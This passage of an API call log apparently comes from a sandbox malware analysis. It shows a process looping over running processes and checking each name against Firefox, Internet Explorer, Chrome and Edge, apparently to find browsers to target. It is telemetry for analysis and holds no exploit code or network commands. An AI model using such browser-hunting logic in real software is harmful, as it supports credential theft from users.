(lpString1="WmiPrvSE.exe", lpString2="microsoftedgecp.exe") returned 1 [0224.119] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x92c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0224.120] lstrcmpiA (lpString1="explorer.exe", lpString2="firefox.exe") returned -1 [0224.120] lstrcmpiA (lpString1="explorer.exe", lpString2="iexplore.exe") returned -1 [0224.120] lstrcmpiA (lpString1="explorer.exe", lpString2="chrome.exe") returned 1 [0224.120] lstrcmpiA (lpString1="explorer.exe", lpString2="microsoftedgecp.exe") returned -1 [0224.120] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x924, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0224.120] lstrcmpiA (lpString1="explorer.exe", lpString2="firefox.exe") returned -1 [0224.120] lstrcmpiA (lpString1="explorer.exe", lpString2="iexplore.exe") returned -1 [0224.121] lstrcmpiA (lpString1="explorer.exe", lpString2="chrome.exe") returned 1 [0224.121] lstrcmpiA (lpString1="explorer.exe", lpString2="microsoftedgecp.exe") returned -1 [0224.121] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x958, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0224.121] lstrcmpiA (lpString1="explorer.exe", lpString2="firefox.exe") returned -1 [0224.121] lstrcmpiA (lpString1="explorer.exe", lpString2="iexplore.exe") returned -1 [0224.121] lstrcmpiA (lpString1="explorer.exe", lpString2="chrome.exe") returned 1 [0224.121] lstrcmpiA (lpString1="explorer.exe", lpString2="microsoftedgecp.exe") returned -1 [0224.121] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x954, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0224.122] lstrcmpiA (lpString1="explorer.exe", lpString2="firefox.exe") returned -1 [0224.122] lstrcmpiA (lpString1="explorer.exe", lpString2="iexplore.exe") returned -1 [0224.122] lstrcmpiA (lpString1="explorer.exe", lpString2="chrome.exe") returned 1 [0224.122] lstrcmpiA (lpString1="explorer.exe", lpString2="microsoftedgecp.exe") returned -1 [0224.122] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x5b8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x6ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="gtjtdfe")) returned 1 [0224.122] lstrcmpiA (lpString1="gtjtdfe", lpString2="firefox.exe") returned 1 [0224.122] lstrcmpiA (lpString1="gtjtdfe", lpString2="iexplore.exe") returned -1 [0224.122] lstrcmpiA (lpString1="gtjtdfe", lpString2="chrome.exe") returned 1 [0224.122] lstrcmpiA (lpString1="gtjtdfe", lpString2="microsoftedgecp.exe") returned -1 [0224.122] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x5b8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x6ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="gtjtdfe")) returned 0 [0224.123] CloseHandle (hObject=0xd4) returned 1 [0224.123] Sleep (dwMilliseconds=0x3e8) [0225.133] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0xd4 [0225.135] Process32First (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0225.135] lstrcmpiA (lpString1="[System Process]", lpString2="firefox.exe") returned -1 [0225.135] lstrcmpiA (lpString1="[System Process]", lpString2="iexplore.exe") returned -1 [0225.135] lstrcmpiA (lpString1="[System Process]", lpString2="chrome.exe") returned -1 [0225.135] lstrcmpiA (lpString1="[System Process]", lpString2="microsoftedgecp.exe") returned -1 [0225.135] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x50, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0225.136] lstrcmpiA (lpString1="System", lpString2="firefox.exe") returned 1 [0225.136] lstrcmpiA (lpString1="System", lpString2="iexplore.exe") returned 1 [0225.136] lstrcmpiA (lpString1="System", lpString2="chrome.exe") returned 1 [0225.136] lstrcmpiA (lpString1="System", lpString2="microsoftedgecp.exe") returned 1 [0225.136] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0225.136] lstrcmpiA (lpString1="smss.exe", lpString2="firefox.exe") returned 1 [0225.136] lstrcmpiA (lpString1="smss.exe", lpString2="iexplore.exe") returned 1 [0225.136] lstrcmpiA (lpString1="smss.exe", lpString2="chrome.exe") returned 1 [0225.136] lstrcmpiA (lpString1="smss.exe", lpString2="microsoftedgecp.exe") returned 1 [0225.136] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0225.137] lstrcmpiA (lpString1="csrss.exe", lpString2="firefox.exe") returned -1 [0225.137] lstrcmpiA (lpString1="csrss.exe", lpString2="iexplore.exe") returned -1 [0225.137] lstrcmpiA (lpString1="csrss.exe", lpString2="chrome.exe") returned 1 [0225.137] lstrcmpiA (lpString1="csrss.exe", lpString2="microsoftedgecp.exe") returned -1 [0225.137] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x17c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0225.137] lstrcmpiA (lpString1="wininit.exe", lpString2="firefox.exe") returned 1 [0225.137] lstrcmpiA (lpString1="wininit.exe", lpString2="iexplore.exe") returned 1 [0225.137] lstrcmpiA (lpString1="wininit.exe", lpString2="chrome.exe") returned 1 [0225.137] lstrcmpiA (lpString1="wininit.exe", lpString2="microsoftedgecp.exe") returned 1 [0225.138] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x188, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0225.138] lstrcmpiA (lpString1="csrss.exe", lpString2="firefox.exe") returned -1 [0225.138] lstrcmpiA (lpString1="csrss.exe", lpString2="iexplore.exe") returned -1 [0225.138] lstrcmpiA (lpString1="csrss.exe", lpString2="chrome.exe") returned 1 [0225.138] lstrcmpiA (lpString1="csrss.exe", lpString2="microsoftedgecp.exe") returned -1 [0225.138] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0225.139] lstrcmpiA (lpString1="winlogon.exe", lpString2="firefox.exe") returned 1 [0225.139] lstrcmpiA (lpString1="winlogon.exe", lpString2="iexplore.exe") returned 1 [0225.139] lstrcmpiA (lpString1="winlogon.exe", lpString2="chrome.exe") returned 1 [0225.139] lstrcmpiA (lpString1="winlogon.exe", lpString2="microsoftedgecp.exe") returned 1 [0225.139] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0225.139] lstrcmpiA (lpString1="services.exe", lpString2="firefox.exe") returned 1 [0225.139] lstrcmpiA (lpString1="services.exe", lpString2="iexplore.exe") returned 1 [0225.139] lstrcmpiA (lpString1="services.exe", lpString2="chrome.exe") returned 1 [0225.139] lstrcmpiA (lpString1="services.exe", lpString2="microsoftedgecp.exe") returned 1 [0225.139] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0225.140] lstrcmpiA (lpString1="lsass.exe", lpString2="firefox.exe") returned 1 [0225.140] lstrcmpiA (lpString1="lsass.exe", lpString2="iexplore.exe") returned 1 [0225.140] lstrcmpiA (lpString1="lsass.exe", lpString2="chrome.exe") returned 1 [0225.140] lstrcmpiA (lpString1="lsass.exe", lpString2="microsoftedgecp.exe") returned -1 [0225.140] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x17c, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0225.140] lstrcmpiA (lpString1="lsm.exe", lpString2="firefox.exe") returned 1 [0225.140] lstrcmpiA (lpString1="lsm.exe", lpString2="iexplore.exe") returned 1 [0225.140] lstrcmpiA (lpString1="lsm.exe", lpString2="chrome.exe") returned 1 [0225.140] lstrcmpiA (lpString1="lsm.exe", lpString2="microsoftedgecp.exe") returned -1 [0225.140] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0225.141] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0225.141] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0225.141] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0225.141] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0225.141] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x298, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0225.141] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0225.141] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0225.142] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0225.142] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0225.142] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x2cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0225.142] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0225.142] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0225.142] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0225.142] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0225.142] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x334, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0225.143] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0225.143] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0225.143] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0225.143] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0225.143] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x36c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1f, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0225.143] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0225.143] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0225.143] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0225.143] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0225.143] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x2cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0225.144] lstrcmpiA (lpString1="audiodg.exe", lpString2="firefox.exe") returned -1 [0225.144] lstrcmpiA (lpString1="audiodg.exe", lpString2="iexplore.exe") returned -1 [0225.144] lstrcmpiA (lpString1="audiodg.exe", lpString2="chrome.exe") returned -1 [0225.144] lstrcmpiA (lpString1="audiodg.exe", lpString2="microsoftedgecp.exe") returned -1 [0225.144] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0225.144] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0225.144] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0225.144] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0225.144] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0225.144] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x124, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0225.145] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0225.145] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0225.145] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0225.145] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0225.145] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x448, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x334, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0225.145] lstrcmpiA (lpString1="dwm.exe", lpString2="firefox.exe") returned -1 [0225.145] lstrcmpiA (lpString1="dwm.exe", lpString2="iexplore.exe") returned -1 [0225.145] lstrcmpiA (lpString1="dwm.exe", lpString2="chrome.exe") returned 1 [0225.145] lstrcmpiA (lpString1="dwm.exe", lpString2="microsoftedgecp.exe") returned -1 [0225.145] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x480, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0225.146] lstrcmpiA (lpString1="spoolsv.exe", lpString2="firefox.exe") returned 1 [0225.146] lstrcmpiA (lpString1="spoolsv.exe", lpString2="iexplore.exe") returned 1 [0225.146] lstrcmpiA (lpString1="spoolsv.exe", lpString2="chrome.exe") returned 1 [0225.146] lstrcmpiA (lpString1="spoolsv.exe", lpString2="microsoftedgecp.exe") returned 1 [0225.146] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0225.147] lstrcmpiA (lpString1="taskhost.exe", lpString2="firefox.exe") returned 1 [0225.147] lstrcmpiA (lpString1="taskhost.exe", lpString2="iexplore.exe") returned 1 [0225.147] lstrcmpiA (lpString1="taskhost.exe", lpString2="chrome.exe") returned 1 [0225.147] lstrcmpiA (lpString1="taskhost.exe", lpString2="microsoftedgecp.exe") returned 1 [0225.147] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0225.147] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0225.147] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0225.147] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0225.147] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0225.147] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x50c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x36c, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0225.148] lstrcmpiA (lpString1="taskeng.exe", lpString2="firefox.exe") returned 1 [0225.148] lstrcmpiA (lpString1="taskeng.exe", lpString2="iexplore.exe") returned 1 [0225.148] lstrcmpiA (lpString1="taskeng.exe", lpString2="chrome.exe") returned 1 [0225.148] lstrcmpiA (lpString1="taskeng.exe", lpString2="microsoftedgecp.exe") returned 1 [0225.148] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xc4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="abortion-serbia-effect.exe")) returned 1 [0225.149] lstrcmpiA (lpString1="abortion-serbia-effect.exe", lpString2="firefox.exe") returned -1 [0225.149] lstrcmpiA (lpString1="abortion-serbia-effect.exe", lpString2="iexplore.exe") returned -1 [0225.149] lstrcmpiA (lpString1="abortion-serbia-effect.exe", lpString2="chrome.exe") returned -1 [0225.149] lstrcmpiA (lpString1="abortion-serbia-effect.exe", lpString2="microsoftedgecp.exe") returned -1 [0225.149] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x62c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="beverages-tapes-dod.exe")) returned 1 [0225.149] lstrcmpiA (lpString1="beverages-tapes-dod.exe", lpString2="firefox.exe") returned -1 [0225.149] lstrcmpiA (lpString1="beverages-tapes-dod.exe", lpString2="iexplore.exe") returned -1 [0225.149] lstrcmpiA (lpString1="beverages-tapes-dod.exe", lpString2="chrome.exe") returned -1 [0225.149] lstrcmpiA (lpString1="beverages-tapes-dod.exe", lpString2="microsoftedgecp.exe") returned -1 [0225.149] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x5a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="receptor paintings.exe")) returned 1 [0225.150] lstrcmpiA (lpString1="receptor paintings.exe", lpString2="firefox.exe") returned 1 [0225.150] lstrcmpiA (lpString1="receptor paintings.exe", lpString2="iexplore.exe") returned 1 [0225.150] lstrcmpiA (lpString1="receptor paintings.exe", lpString2="chrome.exe") returned 1 [0225.150] lstrcmpiA (lpString1="receptor paintings.exe", lpString2="microsoftedgecp.exe") returned 1 [0225.150] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x780, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="definitely.exe")) returned 1 [0225.150] lstrcmpiA (lpString1="definitely.exe", lpString2="firefox.exe") returned -1 [0225.150] lstrcmpiA (lpString1="definitely.exe", lpString2="iexplore.exe") returned -1 [0225.150] lstrcmpiA (lpString1="definitely.exe", lpString2="chrome.exe") returned 1 [0225.150] lstrcmpiA (lpString1="definitely.exe", lpString2="microsoftedgecp.exe") returned -1 [0225.150] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x240, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="knewdifferenceskaren.exe")) returned 1 [0225.151] lstrcmpiA (lpString1="knewdifferenceskaren.exe", lpString2="firefox.exe") returned 1 [0225.151] lstrcmpiA (lpString1="knewdifferenceskaren.exe", lpString2="iexplore.exe") returned 1 [0225.151] lstrcmpiA (lpString1="knewdifferenceskaren.exe", lpString2="chrome.exe") returned 1 [0225.151] lstrcmpiA (lpString1="knewdifferenceskaren.exe", lpString2="microsoftedgecp.exe") returned -1 [0225.151] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x2c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="whenever.exe")) returned 1 [0225.152] lstrcmpiA (lpString1="whenever.exe", lpString2="firefox.exe") returned 1 [0225.152] lstrcmpiA (lpString1="whenever.exe", lpString2="iexplore.exe") returned 1 [0225.152] lstrcmpiA (lpString1="whenever.exe", lpString2="chrome.exe") returned 1 [0225.152] lstrcmpiA (lpString1="whenever.exe", lpString2="microsoftedgecp.exe") returned 1 [0225.152] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x310, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="potentially.exe")) returned 1 [0225.152] lstrcmpiA (lpString1="potentially.exe", lpString2="firefox.exe") returned 1 [0225.152] lstrcmpiA (lpString1="potentially.exe", lpString2="iexplore.exe") returned 1 [0225.152] lstrcmpiA (lpString1="potentially.exe", lpString2="chrome.exe") returned 1 [0225.152] lstrcmpiA (lpString1="potentially.exe", lpString2="microsoftedgecp.exe") returned 1 [0225.152] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x314, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="seeker.exe")) returned 1 [0225.153] lstrcmpiA (lpString1="seeker.exe", lpString2="firefox.exe") returned 1 [0225.153] lstrcmpiA (lpString1="seeker.exe", lpString2="iexplore.exe") returned 1 [0225.153] lstrcmpiA (lpString1="seeker.exe", lpString2="chrome.exe") returned 1 [0225.153] lstrcmpiA (lpString1="seeker.exe", lpString2="microsoftedgecp.exe") returned 1 [0225.153] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x320, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="objects-virus-israeli.exe")) returned 1 [0225.153] lstrcmpiA (lpString1="objects-virus-israeli.exe", lpString2="firefox.exe") returned 1 [0225.153] lstrcmpiA (lpString1="objects-virus-israeli.exe", lpString2="iexplore.exe") returned 1 [0225.153] lstrcmpiA (lpString1="objects-virus-israeli.exe", lpString2="chrome.exe") returned 1 [0225.153] lstrcmpiA (lpString1="objects-virus-israeli.exe", lpString2="microsoftedgecp.exe") returned 1 [0225.153] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="birth bean.exe")) returned 1 [0225.154] lstrcmpiA (lpString1="birth bean.exe", lpString2="firefox.exe") returned -1 [0225.154] lstrcmpiA (lpString1="birth bean.exe", lpString2="iexplore.exe") returned -1 [0225.154] lstrcmpiA (lpString1="birth bean.exe", lpString2="chrome.exe") returned -1 [0225.154] lstrcmpiA (lpString1="birth bean.exe", lpString2="microsoftedgecp.exe") returned -1 [0225.154] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x688, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="ruby.exe")) returned 1 [0225.154] lstrcmpiA (lpString1="ruby.exe", lpString2="firefox.exe") returned 1 [0225.154] lstrcmpiA (lpString1="ruby.exe", lpString2="iexplore.exe") returned 1 [0225.154] lstrcmpiA (lpString1="ruby.exe", lpString2="chrome.exe") returned 1 [0225.155] lstrcmpiA (lpString1="ruby.exe", lpString2="microsoftedgecp.exe") returned 1 [0225.155] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7f0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="zoodiffer.exe")) returned 1 [0225.155] lstrcmpiA (lpString1="zoodiffer.exe", lpString2="firefox.exe") returned 1 [0225.155] lstrcmpiA (lpString1="zoodiffer.exe", lpString2="iexplore.exe") returned 1 [0225.155] lstrcmpiA (lpString1="zoodiffer.exe", lpString2="chrome.exe") returned 1 [0225.155] lstrcmpiA (lpString1="zoodiffer.exe", lpString2="microsoftedgecp.exe") returned 1 [0225.155] Process32Next (in: hSnapshot=0xd4, 